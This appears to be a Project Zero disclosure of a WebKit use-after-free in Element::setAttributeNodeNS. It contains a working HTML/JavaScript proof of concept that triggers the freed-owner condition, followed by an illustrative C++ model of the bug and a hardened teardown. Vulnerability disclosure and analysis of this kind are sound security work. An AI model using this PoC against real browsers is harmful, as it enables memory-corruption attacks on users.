
55 lines
1.5 KiB
HTML
Executable file
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1187

Here's a snippet of Element::setAttributeNodeNS.

ExceptionOr<RefPtr<Attr>> Element::setAttributeNodeNS(Attr& attrNode)
{
    ...
    setAttributeInternal(index, attrNode.qualifiedName(), attrNode.value(), NotInSynchronizationOfLazyAttribute);

    attrNode.attachToElement(*this);
    treeScope().adoptIfNeeded(attrNode);
    ensureAttrNodeListForElement(*this).append(&attrNode);

    return WTFMove(oldAttrNode);
}

|setAttributeInternal| may execute arbitrary JavaScript. If |setAttributeNodeNS| is called again from within |setAttributeInternal|, there will be two |Attr|s that have the same owner element and the same name after the first |setAttributeNodeNS| call. One of the |Attr|s will hold the raw pointer to the owner element even after the owner element is freed.

PoC:
-->

<body>
<script>
// Allocation pressure to force a garbage collection of the removed iframe.
function gc() {
    for (let i = 0; i < 0x40; i++) {
        new ArrayBuffer(0x1000000);
    }
}

// Invoked from the iframe's javascript: URL while f.setAttributeNodeNS(src)
// is still running inside setAttributeInternal.
window.callback = () => {
    window.callback = null;

    d.setAttributeNodeNS(src);
    f.setAttributeNodeNS(document.createAttribute('src'));
};

let src = document.createAttribute('src');
src.value = 'javascript:parent.callback()';

let d = document.createElement('div');
let f = document.body.appendChild(document.createElement('iframe'));
f.setAttributeNodeNS(src);
f.remove();
f = null;
src = null;

gc();

// The Attr reachable through d still holds the raw pointer to the freed iframe.
alert(d.attributes[0].ownerElement);
</script>
</body>
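The ownership problem the comment above describes, reduced to a small stand-alone C++ model added here for illustration; this is not WebKit code, and `Element`, `Attr`, the callback hook and the two teardown routines are simplified stand-ins. It shows how re-entrancy during `setAttributeInternal` leaves two same-name `Attr`s on one element, why a by-name detach loop misses one of them, and one way a teardown that walks the `Attr` list directly avoids the dangling back-pointer (a mitigation for the model, not a claim about WebKit's actual patch).

```cpp
#include <algorithm>
#include <functional>
#include <string>
#include <vector>

struct Element;

// Hypothetical Attr wrapper: keeps a raw back-pointer to its owner, as in the real one.
struct Attr {
    std::string name;
    Element* owner = nullptr;
};

struct Element {
    std::vector<std::string> attributes;   // attribute names stored on the element
    std::vector<Attr*> attrNodeList;       // Attr wrappers that have been handed to script
    std::function<void()> onAttributeSet;  // stands in for script run by setAttributeInternal

    void setAttributeInternal(const std::string& name) {
        if (std::find(attributes.begin(), attributes.end(), name) == attributes.end())
            attributes.push_back(name);
        if (onAttributeSet) { auto cb = onAttributeSet; onAttributeSet = nullptr; cb(); }
    }
    // Vulnerable ordering from the page: script runs before the Attr is attached and appended.
    void setAttributeNodeNS(Attr& attr) {
        setAttributeInternal(attr.name);
        attr.owner = this;
        attrNodeList.push_back(&attr);
    }
    Attr* findAttrNodeInList(const std::string& name) {
        for (Attr* a : attrNodeList) if (a->name == name) return a;
        return nullptr;
    }
    // Buggy teardown: one lookup per attribute name, so a second same-name Attr keeps its pointer.
    void detachAllByName() {
        for (auto& n : attributes) if (Attr* a = findAttrNodeInList(n)) a->owner = nullptr;
        attrNodeList.clear();
    }
    // Hardened teardown: clear the back-pointer of every Attr actually in the list.
    void detachAllInList() {
        for (Attr* a : attrNodeList) a->owner = nullptr;
        attrNodeList.clear();
    }
};

// Replays the PoC's sequence and returns how many Attrs still point at f after its teardown.
int danglingAfterTeardown(bool hardened) {
    Element f, d;
    Attr src{"src"}, fresh{"src"};
    f.onAttributeSet = [&] { d.setAttributeNodeNS(src); f.setAttributeNodeNS(fresh); };
    f.setAttributeNodeNS(src);  // f's list ends up as [fresh, src], both named "src"
    if (hardened) f.detachAllInList(); else f.detachAllByName();
    Attr* all[] = {&src, &fresh};
    int dangling = 0;
    for (Attr* a : all) if (a->owner == &f) ++dangling;
    return dangling;
}
```

With the by-name teardown the `src` wrapper, still reachable through `d`, keeps pointing at `f`; walking the list detaches both.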